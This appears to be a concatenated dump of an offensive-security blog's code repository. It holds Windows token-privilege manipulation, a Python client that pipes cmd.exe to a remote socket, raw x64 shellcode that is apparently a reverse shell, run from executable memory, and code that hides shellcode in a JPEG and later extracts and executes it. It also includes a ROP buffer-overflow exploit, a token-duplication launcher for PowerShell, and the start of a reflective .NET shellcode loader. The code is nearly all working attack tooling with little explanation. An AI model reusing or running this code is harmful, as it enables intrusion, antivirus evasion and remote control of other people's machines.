29 | printf("error opening thread token: %d\n", GetLastError());
30 |
31 | if (!AdjustTokenPrivileges(pToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
32 | {
33 | Color(14);
34 | printf("{!] AdjustTokenPrivileges error: %u\n", GetLastError());
35 | Color(7);
36 | exit(0);
37 | }
38 |
39 | if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
40 |
41 | {
42 | Color(14);
43 | printf("[!] The thread token does not have this specified privilege available to the process. \n");
44 | Color(7);
45 | exit(0);
46 | }
47 | Color(2);
48 | printf("[+] Privilege: %ws added successfully to the thread!!!\n", privname);
49 | Color(7);
50 | CloseHandle(pToken);
51 |
52 | }
53 |
54 |
55 | void setProcessPrivs(LPCWSTR privname)
56 | {
57 |
58 | TOKEN_PRIVILEGES tp;
59 | LUID luid;
60 | HANDLE pToken;
61 |
62 | if (!LookupPrivilegeValue(
63 | NULL, // lookup privilege on local system
64 | privname, // privilege to lookup
65 | &luid)) // receives LUID of privilege
66 | {
67 | Color(14);
68 | printf("[!] LookupPrivilegeValue error: %u\n", GetLastError());
69 | Color(7);
70 | exit(0);
71 | }
72 |
73 | tp.PrivilegeCount = 1;
74 | tp.Privileges[0].Luid = luid;
75 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
76 |
77 | if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &pToken))
78 | printf("[+] opened process token!\n");
79 |
80 | if (!AdjustTokenPrivileges(pToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
81 | {
82 | Color(14);
83 | printf("[!] AdjustTokenPrivileges error: %u\n", GetLastError());
84 | Color(7);
85 | exit(0);
86 | }
87 |
88 | if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
89 |
90 | {
91 | Color(14);
92 | printf("[!] The token does not have this specified privilege available to the process. \n");
93 | Color(7);
94 | exit(0);
95 | }
96 | Color(2);
97 | printf("[+] Privilege: %ws added successfully!!!\n", privname);
98 | Color(7);
99 | CloseHandle(pToken);
100 |
101 | }
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/migrator/tokenprivs.cpp:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 | #include
5 | #include "def.h"
6 |
7 | bool IsProcessElevated() {
8 | BOOL isElevated = FALSE;
9 | HANDLE hToken = NULL;
10 | TOKEN_ELEVATION elevation;
11 | DWORD dwSize;
12 |
13 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
14 | std::cerr << "OpenProcessToken error: " << GetLastError() << std::endl;
15 | return false;
16 | }
17 |
18 | if (!GetTokenInformation(hToken, TokenElevation, &elevation, sizeof(elevation), &dwSize)) {
19 | std::cerr << "GetTokenInformation error: " << GetLastError() << std::endl;
20 | CloseHandle(hToken);
21 | return false;
22 | }
23 |
24 | isElevated = elevation.TokenIsElevated;
25 | CloseHandle(hToken);
26 | return isElevated;
27 | }
28 |
29 | void setThreadPrivs(LPCWSTR privname)
30 | {
31 |
32 | TOKEN_PRIVILEGES tp;
33 | LUID luid;
34 | HANDLE pToken;
35 |
36 | if (!LookupPrivilegeValue(
37 | NULL, // lookup privilege on local system
38 | privname, // privilege to lookup
39 | &luid)) // receives LUID of privilege
40 | {
41 | printf("[!] LookupPrivilegeValue error: %u\n", GetLastError());
42 | exit(0);
43 | }
44 |
45 | tp.PrivilegeCount = 1;
46 | tp.Privileges[0].Luid = luid;
47 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
48 |
49 | if (OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES, NULL, &pToken))
50 | printf("[+] opened process thread token!\n");
51 | else
52 | printf("error opening thread token: %d\n", GetLastError());
53 |
54 | if (!AdjustTokenPrivileges(pToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
55 | {
56 |
57 | printf("{!] AdjustTokenPrivileges error: %u\n", GetLastError());
58 | exit(0);
59 | }
60 |
61 | if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
62 |
63 | {
64 | printf("[!] The thread token does not have this specified privilege available to the process. \n");
65 | exit(0);
66 | }
67 | printf("[+] Privilege: %ws added successfully to the thread!!!\n", privname);
68 | CloseHandle(pToken);
69 |
70 | }
71 |
72 |
73 | void setProcessPrivs(LPCWSTR privname)
74 | {
75 |
76 | TOKEN_PRIVILEGES tp;
77 | LUID luid;
78 | HANDLE pToken;
79 |
80 | if (!LookupPrivilegeValue(
81 | NULL, // lookup privilege on local system
82 | privname, // privilege to lookup
83 | &luid)) // receives LUID of privilege
84 | {
85 | printf("[!] LookupPrivilegeValue error: %u\n", GetLastError());
86 | exit(0);
87 | }
88 |
89 | tp.PrivilegeCount = 1;
90 | tp.Privileges[0].Luid = luid;
91 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
92 |
93 | if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &pToken))
94 | printf("[+] opened process token!\n");
95 |
96 | if (!AdjustTokenPrivileges(pToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
97 | {
98 | printf("[!] AdjustTokenPrivileges error: %u\n", GetLastError());
99 | exit(0);
100 | }
101 |
102 | if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
103 |
104 | {
105 | printf("[!] The token does not have this specified privilege available to the process. \n");
106 | exit(0);
107 | }
108 | printf("[+] Privilege: %ws added successfully!!!\n", privname);
109 | CloseHandle(pToken);
110 |
111 | }
--------------------------------------------------------------------------------
/2023-08-19-Create your own Netcat using Python/custom_netcat_cli.py:
--------------------------------------------------------------------------------
1 | import argparse
2 | import socket
3 | import subprocess
4 | import sys
5 | import threading
6 | import os
7 | import time
8 | from win32com.shell import shell
9 |
10 | #cmd.exe has now executed our command this client received from the server. Now we send the STDOUT result of that command after it ran via cmd.exe!
11 | def shellstdout_sender(client, myshellproc):
12 |
13 | while True:
14 | output=myshellproc.stdout.read1()
15 | try:
16 | client.send(output)
17 | #basic exception handler to kill the process for cmd.exe if we cannot reach the server
18 | except:
19 | print("connection died...")
20 | subprocess.Popen("TASKKILL /F /PID {pid} /T".format(pid=myshellproc.pid))
21 | client.close()
22 | os._exit(0)
23 | #send errors (example: you typed 'net usr' intead of 'net user'. This will show you the error produced by cmd.exe
24 | def shellstderr_sender(client, myshellproc):
25 |
26 | while True:
27 | output=myshellproc.stderr.read1()
28 | try:
29 | client.send(output)
30 | #basic exception handler to kill the process for cmd.exe if we cannot reach the server
31 | except:
32 | print("connection died...")
33 | subprocess.Popen("TASKKILL /F /PID {pid} /T".format(pid=myshellproc.pid))
34 | client.close()
35 | os._exit(0)
36 |
37 | #This function will take the command the server sent to this client, write it to the cmd.exe console, and execute it
38 | #The shellsender() function will send the results of the executed command back to the server / attacker
39 | def shellreceiver(client, myshellproc):
40 | while True:
41 | try:
42 | data = client.recv(1024)
43 | if len(data) > 0:
44 | #if you type :leave: in the server/attacker console it closes the connection. similar to 'exit' but just a custom version of that that I like to implement
45 | if ":leave:" in data.decode("UTF-8"):
46 | subprocess.Popen("TASKKILL /F /PID {pid} /T".format(pid=myshellproc.pid))
47 | client.close()
48 | os._exit(0)
49 | myshellproc.stdin.write(data)
50 | myshellproc.stdin.flush()
51 | #basic exception handler to kill the process for cmd.exe if we cannot reach the server
52 | except:
53 | print("connection died...")
54 | subprocess.Popen("TASKKILL /F /PID {pid} /T".format(pid=myshellproc.pid))
55 | client.close()
56 | os._exit(0)
57 |
58 | # start the command shell and pipe it's contents to stdin, stout, and stderr
59 | myshellproc = subprocess.Popen("cmd.exe", stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
60 |
61 | host="127.0.0.1"
62 | port=4546
63 |
64 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
65 | try:
66 | client.connect((host, port))
67 | except:
68 | print("server/socket must have died...time to hop off")
69 | os._exit(0)
70 |
71 | #This initiates our function threads!
72 | ###############################################
73 | s2p_thread = threading.Thread(target=shellstdout_sender, args=[client, myshellproc])
74 | s2p_thread.daemon = True
75 | s2p_thread.start()
76 |
77 | s2p_thread = threading.Thread(target=shellstderr_sender, args=[client, myshellproc])
78 | s2p_thread.daemon = True
79 | s2p_thread.start()
80 |
81 | s2p_thread = threading.Thread(target=shellreceiver, args=[client, myshellproc])
82 | s2p_thread.daemon = True
83 | s2p_thread.start()
84 | ###############################################
85 |
86 | #continuous loop
87 | while True:
88 | time.sleep(1)
--------------------------------------------------------------------------------
/2025-5-16-Steganography is still relevant!/hide_in_jpeg.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 |
7 | const std::string BEGIN_MARKER = "phoebe_b"; // Marker for the beginning of shellcode
8 | const std::string END_MARKER = "phoebe_e"; // Marker for the end of shellcode
9 |
10 | // The shellcode to embed, specified directly in the code
11 | unsigned char shellcode[] =
12 | "\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9\x65\x48\x8b\x41\x60\x48\x8b\x40\x18\x48\x8b"
13 | "\x70\x10\x48\x8b\x36\x48\x8b\x36\x48\x8b\x5e\x30\x49\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x48"
14 | "\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x44\x8b\x52\x14\x4d"
15 | "\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4c\x89\xd1\x48\xb8\x64\x64\x72\x65\x73\x73\x90\x90"
16 | "\x48\xc1\xe0\x10\x48\xc1\xe8\x10\x50\x48\xb8\x47\x65\x74\x50\x72\x6f\x63\x41\x50\x48\x89"
17 | "\xe0\x67\xe3\x20\x31\xdb\x41\x8b\x1c\x8b\x4c\x01\xc3\x48\xff\xc9\x4c\x8b\x08\x4c\x39\x0b"
18 | "\x75\xe9\x44\x8b\x48\x08\x44\x39\x4b\x08\x74\x03\x75\xdd\xcc\x51\x41\x5f\x49\xff\xc7\x4d"
19 | "\x31\xdb\x44\x8b\x5a\x1c\x4d\x01\xc3\x43\x8b\x04\xbb\x4c\x01\xc0\x50\x41\x5f\x4d\x89\xfc"
20 | "\x4c\x89\xc7\x4c\x89\xc1\xb8\x61\x72\x79\x41\x50\x48\xb8\x4c\x6f\x61\x64\x4c\x69\x62\x72"
21 | "\x50\x48\x89\xe2\x48\x83\xec\x30\x41\xff\xd7\x48\x83\xc4\x30\x49\x89\xc7\x4d\x89\xe6\x48"
22 | "\x89\xf9\xb8\x65\x73\x73\x90\xc1\xe0\x08\xc1\xe8\x08\x50\x48\xb8\x45\x78\x69\x74\x50\x72"
23 | "\x6f\x63\x50\x48\x89\xe2\x48\x83\xec\x30\x41\xff\xd6\x48\x83\xc4\x30\x49\x89\xc6\xb8\x6c"
24 | "\x6c\x90\x90\xc1\xe0\x10\xc1\xe8\x10\x50\x48\xb8\x75\x73\x65\x72\x33\x32\x2e\x64\x50\x48"
25 | "\x89\xe1\x48\x83\xec\x30\x41\xff\xd7\x48\x89\xc7\x48\x89\xf9\xb8\x6f\x78\x41\x90\xc1\xe0"
26 | "\x08\xc1\xe8\x08\x50\x48\xb8\x4d\x65\x73\x73\x61\x67\x65\x42\x50\x48\x89\xe2\x48\x83\xec"
27 | "\x30\x41\xff\xd4\x49\x89\xc7\x48\x31\xc9\xb8\x6d\x90\x90\x90\xc1\xe0\x18\xc1\xe8\x18\x50"
28 | "\x48\xb8\x67\x33\x74\x73\x79\x73\x74\x33\x50\x48\x89\xe2\x49\x89\xe0\x45\x31\xc9\x48\x83"
29 | "\xec\x30\x41\xff\xd7\x48\x83\xc4\x30\x31\xc9\x41\xff\xd6";
30 |
31 |
32 | // Function to embed shellcode in a JPEG file
33 | bool EmbedShellcodeInJPEG(const std::string& jpegPath, const std::string& outputPath) {
34 | // Read the JPEG file
35 | std::ifstream jpegFile(jpegPath, std::ios::binary);
36 | if (!jpegFile) {
37 | std::cerr << "Failed to open JPEG file!" << std::endl;
38 | return false;
39 | }
40 | std::vector jpegData((std::istreambuf_iterator(jpegFile)), std::istreambuf_iterator());
41 | jpegFile.close();
42 |
43 | // Append the beginning marker
44 | jpegData.insert(jpegData.end(), BEGIN_MARKER.begin(), BEGIN_MARKER.end());
45 |
46 | // Append the shellcode
47 | jpegData.insert(jpegData.end(), std::begin(shellcode), std::end(shellcode));
48 |
49 | // Append the ending marker
50 | jpegData.insert(jpegData.end(), END_MARKER.begin(), END_MARKER.end());
51 |
52 | // Write the modified data to the output file
53 | std::ofstream outputFile(outputPath, std::ios::binary);
54 | if (!outputFile) {
55 | std::cerr << "Failed to open output file!" << std::endl;
56 | return false;
57 | }
58 | outputFile.write(reinterpret_cast(jpegData.data()), jpegData.size());
59 | outputFile.close();
60 |
61 | std::cout << "Shellcode embedded successfully!" << std::endl;
62 | return true;
63 | }
64 |
65 |
66 | int main() {
67 | std::string jpegFilePath = "c:\\users\\public\\stego.jpg"; // Path to the input JPEG file
68 | std::string outputFilePath = "c:\\users\\public\\output.jpg"; // Path for the output JPEG with embedded shellcode
69 |
70 | // Embed shellcode in JPEG
71 | if (!EmbedShellcodeInJPEG(jpegFilePath, outputFilePath)) {
72 | return 1;
73 | }
74 |
75 | return 0;
76 | }
77 |
--------------------------------------------------------------------------------
/2024-11-17-x64 Assembly & Shellcoding 101 - Conclusion/shellcode.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | // Shellcode (as given, formatted for clarity)
5 | unsigned char shellcode[] =
6 | "\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9\x65\x48\x8b\x41\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\x8b"
7 | "\x36\x48\x8b\x36\x48\x8b\x5e\x30\x49\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48"
8 | "\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x44\x8b\x52\x14\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4c\x89\xd1"
9 | "\x48\xb8\x64\x64\x72\x65\x73\x73\x90\x90\x48\xc1\xe0\x10\x48\xc1\xe8\x10\x50\x48\xb8\x47\x65\x74\x50\x72"
10 | "\x6f\x63\x41\x50\x48\x89\xe0\x67\xe3\x20\x31\xdb\x41\x8b\x1c\x8b\x4c\x01\xc3\x48\xff\xc9\x4c\x8b\x08\x4c"
11 | "\x39\x0b\x75\xe9\x44\x8b\x48\x08\x44\x39\x4b\x08\x74\x03\x75\xdd\xcc\x51\x41\x5f\x49\xff\xc7\x4d\x31\xdb"
12 | "\x44\x8b\x5a\x1c\x4d\x01\xc3\x43\x8b\x04\xbb\x4c\x01\xc0\x50\x41\x5f\x4d\x89\xfc\x4c\x89\xc7\x4c\x89\xc1"
13 | "\xb8\x61\x72\x79\x41\x50\x48\xb8\x4c\x6f\x61\x64\x4c\x69\x62\x72\x50\x48\x89\xe2\x48\x83\xec\x30\x41\xff"
14 | "\xd7\x48\x83\xc4\x30\x49\x89\xc7\x4d\x89\xe1\x48\x89\xf9\xb8\x65\x73\x73\x90\xc1\xe0\x08\xc1\xe8\x08\x50"
15 | "\x48\xb8\x45\x78\x69\x74\x50\x72\x6f\x63\x50\x48\x89\xe2\x48\x83\xec\x30\x41\xff\xd1\x48\x83\xc4\x30\x48"
16 | "\x89\xc3\x4d\x89\xe1\x48\x89\xf9\x48\xb8\x6f\x63\x65\x73\x73\x41\x90\x90\x48\xc1\xe0\x10\x48\xc1\xe8\x10"
17 | "\x50\x48\xb8\x43\x72\x65\x61\x74\x65\x50\x72\x50\x48\x89\xe2\x48\x83\xec\x30\x41\xff\xd1\x48\x83\xc4\x30"
18 | "\x49\x89\xc5\xb8\x6c\x6c\x90\x90\xc1\xe0\x10\xc1\xe8\x10\x50\x48\xb8\x77\x73\x32\x5f\x33\x32\x2e\x64\x50"
19 | "\x48\x89\xe1\x48\x83\xec\x30\x41\xff\xd7\x49\x89\xc6\x4c\x89\xf1\xb8\x75\x70\x90\x90\xc1\xe0\x10\xc1\xe8"
20 | "\x10\x50\x48\xb8\x57\x53\x41\x53\x74\x61\x72\x74\x50\x48\x89\xe2\x48\x83\xec\x30\x41\xff\xd4\x49\x89\xc7"
21 | "\x4c\x89\xf1\xb8\x74\x41\x90\x90\xc1\xe0\x10\xc1\xe8\x10\x50\x48\xb8\x57\x53\x41\x53\x6f\x63\x6b\x65\x50"
22 | "\x48\x89\xe2\x48\x83\xec\x30\x41\xff\xd4\x48\x89\xc6\x4c\x89\xf1\xb8\x63\x74\x90\x90\xc1\xe0\x10\xc1\xe8"
23 | "\x10\x50\x48\xb8\x57\x53\x41\x43\x6f\x6e\x6e\x65\x50\x48\x89\xe2\x48\x83\xec\x30\x41\xff\xd4\x48\x89\xc7"
24 | "\x4d\x89\xee\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x8d\x14\x24\x66\xb9\x02\x02\x48\x83\xec\x28\x41"
25 | "\xff\xd7\x48\x83\xc4\x30\x48\x31\xc9\xb1\x02\x48\x31\xd2\xb2\x01\x4d\x31\xc0\x41\xb0\x06\x4d\x31\xc9\x4c"
26 | "\x89\x4c\x24\x20\x4c\x89\x4c\x24\x28\xff\xd6\x49\x89\xc4\x48\x83\xc4\x30\x49\x89\xc5\x4c\x89\xe9\x48\x31"
27 | "\xc0\x48\xff\xc0\x48\xff\xc0\x48\x89\x04\x24\x66\xb8\x23\x29\x66\x89\x44\x24\x02\x48\xc7\xc0\x80\xff\xff"
28 | "\xfe\x48\xf7\xd0\x48\x89\x44\x24\x04\x48\x8d\x14\x24\x41\xb0\x16\x4d\x31\xc9\x41\x51\x41\x51\x41\x51\x48"
29 | "\x83\xc4\x08\x48\x83\xec\x60\x48\x83\xec\x60\xff\xd7\x48\x83\xc4\x30\x48\xb8\x9c\x92\x9b\xd1\x9a\x87\x9a"
30 | "\xff\x48\xf7\xd0\x50\x48\x89\xe1\x41\x55\x41\x55\x41\x55\x48\x31\xc0\x50\x50\x66\x50\xb0\x01\xc1\xe0\x08"
31 | "\x66\x50\x48\x31\xc0\x50\x50\x50\x66\x50\x66\x50\x50\x50\x50\xb0\x68\x50\x48\x89\xe7\x48\x89\xe0\x66\x2d"
32 | "\xff\x04\x66\xff\xc8\x50\x57\x48\x31\xc0\x50\x50\x50\x48\xff\xc0\x50\x48\x31\xc0\x50\x50\x50\x50\x49\x89"
33 | "\xc0\x49\x89\xc1\x48\x89\xca\x48\x89\xc1\x41\xff\xd6\x48\x31\xc9\xff\xd3";
34 |
35 | int main() {
36 | // Allocate executable memory
37 | void* exec_mem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
38 |
39 | if (exec_mem == nullptr) {
40 | std::cerr << "Memory allocation failed\n";
41 | return -1;
42 | }
43 |
44 | // Copy shellcode to the allocated memory
45 | memcpy(exec_mem, shellcode, sizeof(shellcode));
46 |
47 | // Create a function pointer to the shellcode
48 | auto shellcode_func = reinterpret_cast(exec_mem);
49 |
50 | // Execute the shellcode
51 | shellcode_func();
52 |
53 | // Free the allocated memory
54 | VirtualFree(exec_mem, 0, MEM_RELEASE);
55 |
56 | return 0;
57 | }
--------------------------------------------------------------------------------
/2025-5-16-Steganography is still relevant!/exec_jpeg.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 |
8 | const std::string BEGIN_MARKER = "phoebe_b"; // Marker for the beginning of shellcode
9 | const std::string END_MARKER = "phoebe_e"; // Marker for the end of shellcode
10 |
11 | // Function to extract the shellcode from the JPEG file
12 | bool ExtractShellcodeFromJPEG(const std::string& jpegPath, const std::string& outputShellcodePath) {
13 | // Read the JPEG file with embedded shellcode
14 | std::ifstream jpegFile(jpegPath, std::ios::binary);
15 | if (!jpegFile) {
16 | std::cerr << "Failed to open JPEG file!" << std::endl;
17 | return false;
18 | }
19 | std::vector jpegData((std::istreambuf_iterator(jpegFile)), std::istreambuf_iterator());
20 | jpegFile.close();
21 |
22 | // Find the markers
23 | auto beginPos = std::search(jpegData.begin(), jpegData.end(), BEGIN_MARKER.begin(), BEGIN_MARKER.end());
24 | auto endPos = std::search(jpegData.begin(), jpegData.end(), END_MARKER.begin(), END_MARKER.end());
25 |
26 | if (beginPos == jpegData.end() || endPos == jpegData.end()) {
27 | std::cerr << "Markers not found in the JPEG file!" << std::endl;
28 | return false;
29 | }
30 |
31 | // Extract the shellcode between the markers
32 | beginPos += BEGIN_MARKER.size(); // Move past the BEGIN_MARKER
33 | std::vector shellcodeData(beginPos, endPos);
34 |
35 | // Write the extracted shellcode to a file
36 | std::ofstream outputFile(outputShellcodePath, std::ios::binary);
37 | if (!outputFile) {
38 | std::cerr << "Failed to open output shellcode file!" << std::endl;
39 | return false;
40 | }
41 | outputFile.write(reinterpret_cast(shellcodeData.data()), shellcodeData.size());
42 | outputFile.close();
43 |
44 | std::cout << "Shellcode extracted successfully!" << std::endl;
45 | return true;
46 | }
47 |
48 | int main() {
49 | std::string outputFilePath = "c:\\users\\public\\output.jpg"; // Path for the output JPEG with embedded shellcode
50 | std::string extractedShellcodePath = "c:\\users\\public\\extracted_shellcode.bin"; // Path for the extracted shellcode
51 |
52 |
53 | // Extract shellcode from the JPEG
54 | if (!ExtractShellcodeFromJPEG(outputFilePath, extractedShellcodePath)) {
55 | return 1;
56 | }
57 |
58 | // Open the .bin file
59 | std::ifstream file("c:\\users\\public\\extracted_shellcode.bin", std::ios::binary | std::ios::ate);
60 | if (!file.is_open()) {
61 | std::cerr << "Failed to open file!" << std::endl;
62 | return -1;
63 | }
64 |
65 | // Get the file size
66 | std::streamsize size = file.tellg();
67 | file.seekg(0, std::ios::beg);
68 |
69 | // Allocate memory for the contents of the file
70 | char* buffer = new char[size];
71 |
72 | // Read the file into the buffer
73 | if (file.read(buffer, size)) {
74 | // Allocate executable memory and copy the content there
75 | void* execMemory = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
76 | if (execMemory == NULL) {
77 | std::cerr << "Memory allocation failed!" << std::endl;
78 | delete[] buffer;
79 | return -1;
80 | }
81 |
82 | // Copy the binary content to the allocated memory
83 | memcpy(execMemory, buffer, size);
84 |
85 | // Cast the memory to a function pointer and execute
86 | typedef void(*Function)();
87 | Function func = reinterpret_cast(execMemory);
88 | func(); // Call the function (execute the binary content)
89 |
90 | // Free memory and resources
91 | VirtualFree(execMemory, 0, MEM_RELEASE);
92 | }
93 | else {
94 | std::cerr << "Failed to read file!" << std::endl;
95 | delete[] buffer;
96 | return -1;
97 | }
98 |
99 | // Cleanup
100 | delete[] buffer;
101 |
102 | return 0;
103 | }
104 |
--------------------------------------------------------------------------------
/2025 - Buffer Overflow Series/buff_for_post.py:
--------------------------------------------------------------------------------
1 | import struct
2 | import subprocess
3 |
4 | # Offset to the return address
5 | junk = 296 # junk (296 bytes)
6 |
7 | payload = b"\x41" * junk
8 |
9 | #rop gadgets for setting the R9 register value
10 | ###################################
11 | payload += struct.pack("
17 |
18 | """
19 | 0000000140007CA5 | 49:89D9 | mov r9,rbx |
20 | 0000000140007CA8 | E8 D3FCFFFF | call overflow3.140007980 |
21 | 0000000140007CAD | 48:98 | cdqe |
22 | 0000000140007CAF | 48:83C4 48 | add rsp,48 |
23 | 0000000140007CB3 | 5B | pop rbx |
24 | 0000000140007CB4 | 5E | pop rsi |
25 | 0000000140007CB5 | 5F | pop rdi |
26 | 0000000140007CB6 | 5D | pop rbp |
27 | 0000000140007CB7 | C3 | ret |
28 | """
29 | payload += b"\x90" * 72
30 | payload += b"\x90" * 32
31 |
32 | #r8 ROP gadgets (this works but RDX MUST be 0x3000)
33 |
34 | payload += struct.pack(" 0x00000001400095AC = 0x3000
36 | payload += struct.pack(" 0x00000001400000AC = 0x1000
55 | payload += struct.pack("
2 | #include
3 | #include
4 |
5 | // Helper function to adjust token integrity
6 | bool SetTokenIntegrityLevel(HANDLE hTokenTarget, HANDLE hTokenSource) {
7 | DWORD dwSize = 0;
8 | TOKEN_MANDATORY_LABEL* pTILSource = nullptr;
9 |
10 | // Get the integrity level of the current process token
11 | if (!GetTokenInformation(hTokenSource, TokenIntegrityLevel, nullptr, 0, &dwSize) &&
12 | GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
13 | std::cerr << "Failed to get token integrity level size: " << GetLastError() << std::endl;
14 | return false;
15 | }
16 |
17 | pTILSource = (TOKEN_MANDATORY_LABEL*)malloc(dwSize);
18 | if (!pTILSource) {
19 | std::cerr << "Memory allocation failed.\n";
20 | return false;
21 | }
22 |
23 | if (!GetTokenInformation(hTokenSource, TokenIntegrityLevel, pTILSource, dwSize, &dwSize)) {
24 | std::cerr << "Failed to get token integrity level: " << GetLastError() << std::endl;
25 | free(pTILSource);
26 | return false;
27 | }
28 |
29 | // Set the integrity level for the target token
30 | if (!SetTokenInformation(hTokenTarget, TokenIntegrityLevel, pTILSource, dwSize)) {
31 | std::cerr << "Failed to set token integrity level: " << GetLastError() << std::endl;
32 | free(pTILSource);
33 | return false;
34 | }
35 |
36 | free(pTILSource);
37 | return true;
38 | }
39 |
40 | int main(int argc, char* argv[]) {
41 | if (argc != 2) {
42 | std::cerr << "Usage: " << std::endl;
43 | return 1;
44 | }
45 |
46 | DWORD targetPID = std::stoi(argv[1]);
47 | HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, targetPID);
48 | if (!hProcess) {
49 | std::cerr << "Failed to open target process: " << GetLastError() << std::endl;
50 | return 1;
51 | }
52 |
53 | HANDLE hToken = NULL;
54 | if (!OpenProcessToken(hProcess, TOKEN_DUPLICATE, &hToken)) {
55 | std::cerr << "Failed to open process token: " << GetLastError() << std::endl;
56 | CloseHandle(hProcess);
57 | return 1;
58 | }
59 |
60 | HANDLE hCurrentProcessToken = NULL;
61 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hCurrentProcessToken)) {
62 | std::cerr << "Failed to open current process token: " << GetLastError() << std::endl;
63 | CloseHandle(hToken);
64 | CloseHandle(hProcess);
65 | return 1;
66 | }
67 |
68 | HANDLE hNewToken = NULL;
69 | if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, nullptr, SecurityImpersonation, TokenPrimary, &hNewToken)) {
70 | std::cerr << "Failed to duplicate token: " << GetLastError() << std::endl;
71 | CloseHandle(hCurrentProcessToken);
72 | CloseHandle(hToken);
73 | CloseHandle(hProcess);
74 | return 1;
75 | }
76 |
77 | // Set the integrity level to match the current process
78 | if (!SetTokenIntegrityLevel(hNewToken, hCurrentProcessToken)) {
79 | std::cerr << "Failed to set integrity level: " << GetLastError() << std::endl;
80 | CloseHandle(hNewToken);
81 | CloseHandle(hCurrentProcessToken);
82 | CloseHandle(hToken);
83 | CloseHandle(hProcess);
84 | return 1;
85 | }
86 |
87 | // Prepare to create a new process with UIAccess
88 | STARTUPINFO si = { 0 };
89 | PROCESS_INFORMATION pi = { 0 };
90 | si.cb = sizeof(si);
91 | si.dwFlags = STARTF_USESHOWWINDOW;
92 | si.wShowWindow = SW_SHOW;
93 |
94 | WCHAR commandLine[] = L"powershell.exe";
95 | // Create the process with UIAccess
96 | if (!CreateProcessAsUser(hNewToken,
97 | nullptr,
98 | commandLine, // Replace with your desired process
99 | nullptr,
100 | nullptr,
101 | FALSE,
102 | CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT,
103 | nullptr,
104 | nullptr,
105 | &si,
106 | &pi))
107 | {
108 | std::cerr << "Failed to create process: " << GetLastError() << std::endl;
109 | CloseHandle(hNewToken);
110 | CloseHandle(hCurrentProcessToken);
111 | CloseHandle(hToken);
112 | CloseHandle(hProcess);
113 | return 1;
114 | }
115 |
116 | std::cout << "Process created with PID: " << pi.dwProcessId << std::endl;
117 |
118 | // Clean up
119 | CloseHandle(hNewToken);
120 | CloseHandle(hCurrentProcessToken);
121 | CloseHandle(hToken);
122 | CloseHandle(hProcess);
123 | CloseHandle(pi.hProcess);
124 | CloseHandle(pi.hThread);
125 |
126 | return 0;
127 | }
--------------------------------------------------------------------------------
/2025-8-12-How to Create a Staged In-Memory .NET Reflective Shellcode Loader/Class1.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | //using System.Threading;
4 |
5 | public class ShellcodeRunner
6 | {
7 | // Define delegate for CreateThread
8 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
9 | delegate IntPtr CreateThreadDelegate(
10 | IntPtr lpThreadAttributes,
11 | uint dwStackSize,
12 | IntPtr lpStartAddress,
13 | IntPtr lpParameter,
14 | uint dwCreationFlags,
15 | out uint lpThreadId);
16 |
17 | [DllImport("kernel32.dll")]
18 | static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
19 |
20 | [DllImport("kernel32.dll")]
21 | static extern IntPtr GetModuleHandle(string lpModuleName);
22 |
23 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
24 | delegate IntPtr VirtualAllocDelegate(
25 | IntPtr lpAddress,
26 | uint dwSize,
27 | uint flAllocationType,
28 | uint flProtect);
29 |
30 | [DllImport("kernel32.dll", SetLastError = true)]
31 | static extern UInt32 WaitForSingleObject(
32 | IntPtr hHandle,
33 | UInt32 dwMilliseconds);
34 |
